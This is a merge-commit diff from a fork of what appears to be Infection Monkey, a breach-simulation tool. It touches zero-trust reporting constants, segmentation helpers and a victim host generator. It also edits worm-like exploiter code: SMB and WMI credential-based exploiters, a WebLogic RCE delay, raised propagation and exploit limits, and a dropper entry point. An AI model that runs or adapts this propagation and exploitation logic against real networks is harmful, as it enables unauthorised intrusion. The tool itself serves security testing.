forked from p15670423/monkey
Merge remote-tracking branch 'upstream/develop' into 420/blackbox
commit f065f30de0
@@ -22,7 +22,7 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
 # Other directories and paths ( most likely you dont need to configure)
 $MONKEY_ISLAND_DIR = "\monkey\monkey_island"
 $MONKEY_DIR = "\monkey\infection_monkey"
-$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\monkey_utils\sambacry_monkey_runner"
+$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner"
 $PYTHON_DLL = "C:\Windows\System32\python27.dll"
 $MK32_DLL = "mk32.dll"
 $MK64_DLL = "mk64.dll"

@@ -129,7 +129,7 @@ python -m pip install --user -r requirements_linux.txt || handle_error
 # Build samba
 log_message "Building samba binaries"
 sudo apt-get install gcc-multilib
-cd ${monkey_home}/monkey/infection_monkey/monkey_utils/sambacry_monkey_runner
+cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner
 sudo chmod +x ./build.sh || handle_error
 ./build.sh

@@ -0,0 +1,2 @@
+from zero_trust_consts import populate_mappings
+populate_mappings()

@@ -0,0 +1,2 @@
+ES_SERVICE = 'elastic-search-9200'

@@ -0,0 +1,3 @@
+POST_BREACH_COMMUNICATE_AS_NEW_USER = "Communicate as new user"
+POST_BREACH_BACKDOOR_USER = "Backdoor user"
+POST_BREACH_FILE_EXECUTION = "File execution"

@@ -0,0 +1,205 @@
+"""
+This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
+in creating findings.
+
+This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
+Some of the mappings are computed when this module is loaded.
+"""
+
+AUTOMATION_ORCHESTRATION = u"Automation & Orchestration"
+VISIBILITY_ANALYTICS = u"Visibility & Analytics"
+WORKLOADS = u"Workloads"
+DEVICES = u"Devices"
+NETWORKS = u"Networks"
+PEOPLE = u"People"
+DATA = u"Data"
+PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION)
+
+STATUS_UNEXECUTED = u"Unexecuted"
+STATUS_PASSED = u"Passed"
+STATUS_VERIFY = u"Verify"
+STATUS_FAILED = u"Failed"
+# Don't change order! The statuses are ordered by importance/severity.
+ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED]
+
+TEST_DATA_ENDPOINT_ELASTIC = u"unencrypted_data_endpoint_elastic"
+TEST_DATA_ENDPOINT_HTTP = u"unencrypted_data_endpoint_http"
+TEST_MACHINE_EXPLOITED = u"machine_exploited"
+TEST_ENDPOINT_SECURITY_EXISTS = u"endpoint_security_exists"
+TEST_SCHEDULED_EXECUTION = u"scheduled_execution"
+TEST_MALICIOUS_ACTIVITY_TIMELINE = u"malicious_activity_timeline"
+TEST_SEGMENTATION = u"segmentation"
+TEST_TUNNELING = u"tunneling"
+TEST_COMMUNICATE_AS_NEW_USER = u"communicate_as_new_user"
+TESTS = (
+    TEST_SEGMENTATION,
+    TEST_MALICIOUS_ACTIVITY_TIMELINE,
+    TEST_SCHEDULED_EXECUTION,
+    TEST_ENDPOINT_SECURITY_EXISTS,
+    TEST_MACHINE_EXPLOITED,
+    TEST_DATA_ENDPOINT_HTTP,
+    TEST_DATA_ENDPOINT_ELASTIC,
+    TEST_TUNNELING,
+    TEST_COMMUNICATE_AS_NEW_USER
+)
+
+PRINCIPLE_DATA_TRANSIT = u"data_transit"
+PRINCIPLE_ENDPOINT_SECURITY = u"endpoint_security"
+PRINCIPLE_USER_BEHAVIOUR = u"user_behaviour"
+PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic"
+PRINCIPLE_SEGMENTATION = u"segmentation"
+PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = u"network_policies"
+PRINCIPLE_USERS_MAC_POLICIES = u"users_mac_policies"
+PRINCIPLES = {
+    PRINCIPLE_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.",
+    PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.",
+    PRINCIPLE_USER_BEHAVIOUR: u"Adopt security user behavior analytics.",
+    PRINCIPLE_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.",
+    PRINCIPLE_DATA_TRANSIT: u"Secure data at transit by encrypting it.",
+    PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: u"Configure network policies to be as restrictive as possible.",
+    PRINCIPLE_USERS_MAC_POLICIES: u"Users' permissions to the network and to resources should be MAC (Mandetory "
+                                  u"Access Control) only.",
+}
+
+POSSIBLE_STATUSES_KEY = u"possible_statuses"
+PILLARS_KEY = u"pillars"
+PRINCIPLE_KEY = u"principle_key"
+FINDING_EXPLANATION_BY_STATUS_KEY = u"finding_explanation"
+TEST_EXPLANATION_KEY = u"explanation"
+TESTS_MAP = {
+    TEST_SEGMENTATION: {
+        TEST_EXPLANATION_KEY: u"The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.",
+        FINDING_EXPLANATION_BY_STATUS_KEY: {
+            STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
+            STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
+        },
+        PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
+        PILLARS_KEY: [NETWORKS],
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
+    },
+    TEST_MALICIOUS_ACTIVITY_TIMELINE: {
+        TEST_EXPLANATION_KEY: u"The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
+        FINDING_EXPLANATION_BY_STATUS_KEY: {
+            STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
+        },
+        PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
+        PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
+    },
+    TEST_ENDPOINT_SECURITY_EXISTS: {
+        TEST_EXPLANATION_KEY: u"The Monkey checked if there is an active process of an endpoint security software.",
+        FINDING_EXPLANATION_BY_STATUS_KEY: {
+            STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
+            STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
+        },
+        PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
+        PILLARS_KEY: [DEVICES],
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+    },
+    TEST_MACHINE_EXPLOITED: {
+        TEST_EXPLANATION_KEY: u"The Monkey tries to exploit machines in order to breach them and propagate in the network.",
+        FINDING_EXPLANATION_BY_STATUS_KEY: {
+            STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
+            STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
+        },
+        PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
+        PILLARS_KEY: [DEVICES],
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY]
+    },
+    TEST_SCHEDULED_EXECUTION: {
+        TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
+        FINDING_EXPLANATION_BY_STATUS_KEY: {
+            STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
+            STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
+        },
+        PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
+        PILLARS_KEY: [PEOPLE, NETWORKS],
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
+    },
+    TEST_DATA_ENDPOINT_ELASTIC: {
+        TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to ElasticSearch instances.",
+        FINDING_EXPLANATION_BY_STATUS_KEY: {
+            STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
+            STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
+        },
+        PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
+        PILLARS_KEY: [DATA],
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+    },
+    TEST_DATA_ENDPOINT_HTTP: {
+        TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to HTTP servers.",
+        FINDING_EXPLANATION_BY_STATUS_KEY: {
+            STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
+            STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
+        },
+        PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
+        PILLARS_KEY: [DATA],
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+    },
+    TEST_TUNNELING: {
+        TEST_EXPLANATION_KEY: u"The Monkey tried to tunnel traffic using other monkeys.",
+        FINDING_EXPLANATION_BY_STATUS_KEY: {
+            STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
+        },
+        PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
+        PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
+    },
+    TEST_COMMUNICATE_AS_NEW_USER: {
+        TEST_EXPLANATION_KEY: u"The Monkey tried to create a new user and communicate with the internet from it.",
+        FINDING_EXPLANATION_BY_STATUS_KEY: {
+            STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.",
+            STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
+        },
+        PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
+        PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+    },
+}
+
+EVENT_TYPE_MONKEY_NETWORK = "monkey_network"
+EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
+EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
+
+PILLARS_TO_TESTS = {
+    DATA: [],
+    PEOPLE: [],
+    NETWORKS: [],
+    DEVICES: [],
+    WORKLOADS: [],
+    VISIBILITY_ANALYTICS: [],
+    AUTOMATION_ORCHESTRATION: []
+}
+
+PRINCIPLES_TO_TESTS = {}
+
+PRINCIPLES_TO_PILLARS = {}
+
+
+def populate_mappings():
+    populate_pillars_to_tests()
+    populate_principles_to_tests()
+    populate_principles_to_pillars()
+
+
+def populate_pillars_to_tests():
+    for pillar in PILLARS:
+        for test, test_info in TESTS_MAP.items():
+            if pillar in test_info[PILLARS_KEY]:
+                PILLARS_TO_TESTS[pillar].append(test)
+
+
+def populate_principles_to_tests():
+    for single_principle in PRINCIPLES:
+        PRINCIPLES_TO_TESTS[single_principle] = []
+    for test, test_info in TESTS_MAP.items():
+        PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test)


+def populate_principles_to_pillars():
+    for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
+        principles_pillars = set()
+        for test in principle_tests:
+            for pillar in TESTS_MAP[test][PILLARS_KEY]:
+                principles_pillars.add(pillar)
+        PRINCIPLES_TO_PILLARS[principle] = principles_pillars

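Note: the sketch below is not part of the commit. It only illustrates, assuming the module is importable as zero_trust_consts (the exact package path is not shown in this hunk), what the computed mappings contain once populate_mappings() has run.

    import zero_trust_consts as consts  # import path assumed for illustration

    consts.populate_mappings()
    # TEST_SEGMENTATION declares PILLARS_KEY: [NETWORKS], so it is indexed under the Networks pillar.
    assert consts.TEST_SEGMENTATION in consts.PILLARS_TO_TESTS[consts.NETWORKS]
    # Its PRINCIPLE_KEY is PRINCIPLE_SEGMENTATION, so it is also grouped under that principle...
    assert consts.TEST_SEGMENTATION in consts.PRINCIPLES_TO_TESTS[consts.PRINCIPLE_SEGMENTATION]
    # ...and the principle inherits the union of its tests' pillars.
    assert consts.NETWORKS in consts.PRINCIPLES_TO_PILLARS[consts.PRINCIPLE_SEGMENTATION]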
@@ -0,0 +1,23 @@
+def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
+    """
+    Finds an IP address in ip_addresses which is in source_subnet but not in target_subnet.
+    :param ip_addresses: List[str]: List of IP addresses to test.
+    :param source_subnet: NetworkRange: Subnet to want an IP to not be in.
+    :param target_subnet: NetworkRange: Subnet we want an IP to be in.
+    :return: The cross segment IP if in source but not in target, else None. Union[str, None]
+    """
+    if get_ip_if_in_subnet(ip_addresses, target_subnet) is not None:
+        return None
+    return get_ip_if_in_subnet(ip_addresses, source_subnet)
+
+
+def get_ip_if_in_subnet(ip_addresses, subnet):
+    """
+    :param ip_addresses: IP address list.
+    :param subnet: Subnet to check if one of ip_addresses is in there. This is common.network.network_range.NetworkRange
+    :return: The first IP in ip_addresses which is in the subnet if there is one, otherwise returns None.
+    """
+    for ip_address in ip_addresses:
+        if subnet.is_in_range(ip_address):
+            return ip_address
+    return None

@@ -0,0 +1,30 @@
+from common.network.network_range import *
+from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
+from monkey_island.cc.testing.IslandTestCase import IslandTestCase
+
+
+class TestSegmentationUtils(IslandTestCase):
+    def test_get_ip_in_src_and_not_in_dst(self):
+        self.fail_if_not_testing_env()
+        source = CidrRange("1.1.1.0/24")
+        target = CidrRange("2.2.2.0/24")
+
+        # IP not in both
+        self.assertIsNone(get_ip_in_src_and_not_in_dst(
+            [text_type("3.3.3.3"), text_type("4.4.4.4")], source, target
+        ))
+
+        # IP not in source, in target
+        self.assertIsNone(get_ip_in_src_and_not_in_dst(
+            [text_type("2.2.2.2")], source, target
+        ))
+
+        # IP in source, not in target
+        self.assertIsNotNone(get_ip_in_src_and_not_in_dst(
+            [text_type("8.8.8.8"), text_type("1.1.1.1")], source, target
+        ))
+
+        # IP in both subnets
+        self.assertIsNone(get_ip_in_src_and_not_in_dst(
+            [text_type("8.8.8.8"), text_type("1.1.1.1")], source, source
+        ))

@@ -141,10 +141,10 @@ class Configuration(object):
     exploiter_classes = []

     # how many victims to look for in a single scan iteration
-    victims_max_find = 30
+    victims_max_find = 100

     # how many victims to exploit before stopping
-    victims_max_exploit = 7
+    victims_max_exploit = 15

     # depth of propagation
     depth = 2

@@ -199,7 +199,7 @@ class Configuration(object):
                         9200]
     tcp_target_ports.extend(HTTP_PORTS)
     tcp_scan_timeout = 3000  # 3000 Milliseconds
-    tcp_scan_interval = 0
+    tcp_scan_interval = 0  # in milliseconds
     tcp_scan_get_banner = True

     # Ping Scanner

@@ -97,8 +97,8 @@
     ],
     "timeout_between_iterations": 10,
     "use_file_logging": true,
-    "victims_max_exploit": 7,
-    "victims_max_find": 30,
+    "victims_max_exploit": 15,
+    "victims_max_find": 100,
     "post_breach_actions" : []
     custom_PBA_linux_cmd = ""
     custom_PBA_windows_cmd = ""

@@ -10,7 +10,8 @@ import requests
 from infection_monkey.exploit.web_rce import WebRCE
 from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\
     DOWNLOAD_TIMEOUT
-from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
+from infection_monkey.network.elasticfinger import ES_PORT
+from common.data.network_consts import ES_SERVICE
 from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
 from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING

@@ -10,6 +10,7 @@ from infection_monkey.exploit import HostExploiter
 from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
 from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
 from infection_monkey.model import DROPPER_ARG
+from infection_monkey.utils.monkey_dir import get_monkey_dir_path
 from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
 from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError

@@ -68,8 +68,12 @@ class SmbExploiter(HostExploiter):
                                                  self._config.smb_download_timeout)

                if remote_full_path is not None:
-                   LOG.debug("Successfully logged in %r using SMB (%s : (SHA-512) %s : %s : %s)",
-                             self.host, user, self._config.hash_sensitive_data(password), lm_hash, ntlm_hash)
+                   LOG.debug("Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
+                             self.host,
+                             user,
+                             self._config.hash_sensitive_data(password),
+                             self._config.hash_sensitive_data(lm_hash),
+                             self._config.hash_sensitive_data(ntlm_hash))
                    self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
                    self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
                                                     SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))

@@ -80,9 +84,15 @@ class SmbExploiter(HostExploiter):
                    self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)

            except Exception as exc:
-               LOG.debug("Exception when trying to copy file using SMB to %r with user:"
-                         " %s, password (SHA-512): '%s', LM hash: %s, NTLM hash: %s: (%s)", self.host,
-                         user, self._config.hash_sensitive_data(password), lm_hash, ntlm_hash, exc)
+               LOG.debug(
+                   "Exception when trying to copy file using SMB to %r with user:"
+                   " %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: (%s)",
+                   self.host,
+                   user,
+                   self._config.hash_sensitive_data(password),
+                   self._config.hash_sensitive_data(lm_hash),
+                   self._config.hash_sensitive_data(ntlm_hash),
+                   exc)
                continue

        if not exploited:

@@ -92,7 +102,8 @@ class SmbExploiter(HostExploiter):
        # execute the remote dropper in case the path isn't final
        if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
            cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
-                     build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path_win_32)
+                     build_monkey_commandline(self.host, get_monkey_depth() - 1,
+                                              self._config.dropper_target_path_win_32)
        else:
            cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
                      build_monkey_commandline(self.host, get_monkey_depth() - 1)

@@ -11,7 +11,7 @@ import infection_monkey.monkeyfs as monkeyfs
 from common.utils.attack_utils import ScanStatus
 from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
 from infection_monkey.exploit.tools.helpers import get_interface_to_target
+from infection_monkey.config import Configuration
 __author__ = 'itamar'

 LOG = logging.getLogger(__name__)

@@ -31,9 +31,13 @@ class SmbTools(object):

        # skip guest users
        if smb.isGuestSession() > 0:
-           LOG.debug("Connection to %r granted guest privileges with user: %s, password: '%s',"
-                     " LM hash: %s, NTLM hash: %s",
-                     host, username, password, lm_hash, ntlm_hash)
+           LOG.debug("Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s',"
+                     " LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
+                     host,
+                     username,
+                     Configuration.hash_sensitive_data(password),
+                     Configuration.hash_sensitive_data(lm_hash),
+                     Configuration.hash_sensitive_data(ntlm_hash))

            try:
                smb.logoff()

@@ -164,9 +168,13 @@ class SmbTools(object):
            smb = None

        if not file_uploaded:
-           LOG.debug("Couldn't find a writable share for exploiting"
-                     " victim %r with username: %s, password: '%s', LM hash: %s, NTLM hash: %s",
-                     host, username, password, lm_hash, ntlm_hash)
+           LOG.debug("Couldn't find a writable share for exploiting victim %r with "
+                     "username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
+                     host,
+                     username,
+                     Configuration.hash_sensitive_data(password),
+                     Configuration.hash_sensitive_data(lm_hash),
+                     Configuration.hash_sensitive_data(ntlm_hash))
            return None

        return remote_full_path

@@ -194,8 +202,15 @@ class SmbTools(object):
        try:
            smb.login(username, password, '', lm_hash, ntlm_hash)
        except Exception as exc:
-           LOG.debug("Error while logging into %r using user: %s, password: '%s', LM hash: %s, NTLM hash: %s: %s",
-                     host, username, password, lm_hash, ntlm_hash, exc)
+           LOG.debug(
+               "Error while logging into %r using user: %s, password (SHA-512): '%s', "
+               "LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: %s",
+               host,
+               username,
+               Configuration.hash_sensitive_data(password),
+               Configuration.hash_sensitive_data(lm_hash),
+               Configuration.hash_sensitive_data(ntlm_hash),
+               exc)
            return None, dialect

        smb.setTimeout(timeout)

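Note: hash_sensitive_data itself is not shown in this diff. The sketch below (not from the commit) only illustrates the pattern these SMB/WMI hunks converge on - hash every credential (password, LM hash, NTLM hash) before it reaches a log line - assuming a SHA-512 digest, as the log message labels state.

    import hashlib
    import logging

    LOG = logging.getLogger(__name__)

    def hash_sensitive_data(secret):
        # Assumed to mirror Configuration.hash_sensitive_data: log a digest, never the raw value.
        return hashlib.sha512(secret.encode()).hexdigest()

    LOG.debug("Login attempt with user: %s, password (SHA-512): %s, NTLM hash (SHA-512): %s",
              "admin", hash_sensitive_data("hunter2"), hash_sensitive_data("aad3b435b51404ee"))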
@@ -252,6 +252,7 @@ class WebLogic201710271(WebRCE):
 # https://github.com/rapid7/metasploit-framework/pull/11780
 class WebLogic20192725(WebRCE):
     URLS = ["_async/AsyncResponseServiceHttps"]
+    DELAY_BEFORE_EXPLOITING_SECONDS = 5

     _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
     _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE

@@ -266,6 +267,11 @@ class WebLogic20192725(WebRCE):
         exploit_config['dropper'] = True
         return exploit_config

+    def execute_remote_monkey(self, url, path, dropper=False):
+        # Without delay exploiter tries to launch monkey file that is still finishing up after downloading.
+        time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
+        super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
+
     def exploit(self, url, command):
         if 'linux' in self.host.os['type']:
             payload = self.get_exploit_payload('/bin/sh', '-c', command)

@@ -37,9 +37,10 @@ class WmiExploiter(HostExploiter):

        for user, password, lm_hash, ntlm_hash in creds:
            password_hashed = self._config.hash_sensitive_data(password)
-           LOG.debug("Attempting to connect %r using WMI with "
-                     "user,password (SHA-512),lm hash,ntlm hash: ('%s','%s','%s','%s')",
-                     self.host, user, password_hashed, lm_hash, ntlm_hash)
+           lm_hash_hashed = self._config.hash_sensitive_data(lm_hash)
+           mtlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
+           creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): ({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed)
+           LOG.debug(("Attempting to connect %r using WMI with " % self.host) + creds_for_logging)

            wmi_connection = WmiTools.WmiConnection()

@@ -47,25 +48,21 @@ class WmiExploiter(HostExploiter):
                wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
            except AccessDeniedException:
                self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
-               LOG.debug("Failed connecting to %r using WMI with "
-                         "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
-                         self.host, user, password_hashed, lm_hash, ntlm_hash)
+               LOG.debug(("Failed connecting to %r using WMI with " % self.host) + creds_for_logging)
                continue
            except DCERPCException:
                self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
-               LOG.debug("Failed connecting to %r using WMI with "
-                         "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
-                         self.host, user, password_hashed, lm_hash, ntlm_hash)
+               LOG.debug(("Failed connecting to %r using WMI with " % self.host) + creds_for_logging)
                continue
            except socket.error:
-               LOG.debug("Network error in WMI connection to %r with "
-                         "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
-                         self.host, user, password_hashed, lm_hash, ntlm_hash)
+               LOG.debug(("Network error in WMI connection to %r with " % self.host) + creds_for_logging)
                return False
            except Exception as exc:
-               LOG.debug("Unknown WMI connection error to %r with "
-                         "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s') (%s):\n%s",
-                         self.host, user, password_hashed, lm_hash, ntlm_hash, exc, traceback.format_exc())
+               LOG.debug(
+                   ("Unknown WMI connection error to %r with " % self.host)
+                   + creds_for_logging
+                   + (" (%s):\n%s" % (exc, traceback.format_exc()))
+               )
                return False

            self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)

@@ -7,8 +7,9 @@ import logging.config
 import os
 import sys
 import traceback
+from multiprocessing import freeze_support

-import infection_monkey.utils as utils
+from infection_monkey.utils.monkey_log_path import get_dropper_log_path, get_monkey_log_path
 from infection_monkey.config import WormConfiguration, EXTERNAL_CONFIG_FILE
 from infection_monkey.dropper import MonkeyDrops
 from infection_monkey.model import MONKEY_ARG, DROPPER_ARG

@@ -43,7 +44,7 @@ def main():

     if 2 > len(sys.argv):
         return True
+    freeze_support() # required for multiprocessing + pyinstaller on windows
     monkey_mode = sys.argv[1]

     if not (monkey_mode in [MONKEY_ARG, DROPPER_ARG]):

@@ -79,10 +80,10 @@ def main():

     try:
         if MONKEY_ARG == monkey_mode:
-            log_path = utils.get_monkey_log_path()
+            log_path = get_monkey_log_path()
             monkey_cls = InfectionMonkey
         elif DROPPER_ARG == monkey_mode:
-            log_path = utils.get_dropper_log_path()
+            log_path = get_dropper_log_path()
             monkey_cls = MonkeyDrops
         else:
             return True

@@ -127,8 +128,8 @@ def main():
             json.dump(json_dict, config_fo, skipkeys=True, sort_keys=True, indent=4, separators=(',', ': '))

         return True
-    except Exception:
-        LOG.exception("Exception thrown from monkey's start function")
+    except Exception as e:
+        LOG.exception("Exception thrown from monkey's start function. More info: {}".format(e))
     finally:
         monkey.cleanup()

@@ -0,0 +1,45 @@
+from infection_monkey.model.host import VictimHost
+
+
+class VictimHostGenerator(object):
+    def __init__(self, network_ranges, blocked_ips, same_machine_ips):
+        self.blocked_ips = blocked_ips
+        self.ranges = network_ranges
+        self.local_addresses = same_machine_ips
+
+    def generate_victims(self, chunk_size):
+        """
+        Generates VictimHosts in chunks from all the instances network ranges
+        :param chunk_size: Maximum size of each chunk
+        """
+        chunk = []
+        for net_range in self.ranges:
+            for victim in self.generate_victims_from_range(net_range):
+                chunk.append(victim)
+                if len(chunk) == chunk_size:
+                    yield chunk
+                    chunk = []
+        if chunk:  # finished with number of victims < chunk_size
+            yield chunk
+
+    def generate_victims_from_range(self, net_range):
+        """
+        Generates VictimHosts from a given netrange
+        :param net_range: Network range object
+        :return: Generator of VictimHost objects
+        """
+        for address in net_range:
+            if not self.is_ip_scannable(address):  # check if the IP should be skipped
+                continue
+            if hasattr(net_range, 'domain_name'):
+                victim = VictimHost(address, net_range.domain_name)
+            else:
+                victim = VictimHost(address)
+            yield victim
+
+    def is_ip_scannable(self, ip_address):
+        if ip_address in self.local_addresses:
+            return False
+        if ip_address in self.blocked_ips:
+            return False
+        return True

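Note: a minimal usage sketch (not part of the commit) of the generator added above, assuming CidrRange accepts a CIDR string as in the tests that follow. It shows the chunked consumption pattern the new scanner uses.

    from common.network.network_range import CidrRange
    from infection_monkey.model.victim_host_generator import VictimHostGenerator

    generator = VictimHostGenerator(network_ranges=[CidrRange("10.0.0.0/28", False)],
                                    blocked_ips=['10.0.0.1'],
                                    same_machine_ips=['10.0.0.2'])
    for chunk in generator.generate_victims(chunk_size=5):
        # Each chunk holds at most 5 VictimHost objects; blocked and local IPs are skipped.
        print([victim.ip_addr for victim in chunk])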
@@ -0,0 +1,46 @@
+from unittest import TestCase
+from infection_monkey.model.victim_host_generator import VictimHostGenerator
+from common.network.network_range import CidrRange, SingleIpRange
+
+
+class VictimHostGeneratorTester(TestCase):
+
+    def setUp(self):
+        self.cidr_range = CidrRange("10.0.0.0/28", False)  # this gives us 15 hosts
+        self.local_host_range = SingleIpRange('localhost')
+        self.random_single_ip_range = SingleIpRange('41.50.13.37')
+
+    def test_chunking(self):
+        chunk_size = 3
+        # current test setup is 15+1+1-1 hosts
+        test_ranges = [self.cidr_range, self.local_host_range, self.random_single_ip_range]
+        generator = VictimHostGenerator(test_ranges, '10.0.0.1', [])
+        victims = generator.generate_victims(chunk_size)
+        for i in range(5):  # quickly check the equally sided chunks
+            self.assertEqual(len(victims.next()), chunk_size)
+        victim_chunk_last = victims.next()
+        self.assertEqual(len(victim_chunk_last), 1)
+
+    def test_remove_blocked_ip(self):
+        generator = VictimHostGenerator(self.cidr_range, ['10.0.0.1'], [])
+
+        victims = list(generator.generate_victims_from_range(self.cidr_range))
+        self.assertEqual(len(victims), 14)  # 15 minus the 1 we blocked
+
+    def test_remove_local_ips(self):
+        generator = VictimHostGenerator([], [], [])
+        generator.local_addresses = ['127.0.0.1']
+        victims = list(generator.generate_victims_from_range(self.local_host_range))
+        self.assertEqual(len(victims), 0)  # block the local IP
+
+    def test_generate_domain_victim(self):
+        # domain name victim
+        generator = VictimHostGenerator([], [], [])  # dummy object
+        victims = list(generator.generate_victims_from_range(self.local_host_range))
+        self.assertEqual(len(victims), 1)
+        self.assertEqual(victims[0].domain_name, 'localhost')
+
+        # don't generate for other victims
+        victims = list(generator.generate_victims_from_range(self.random_single_ip_range))
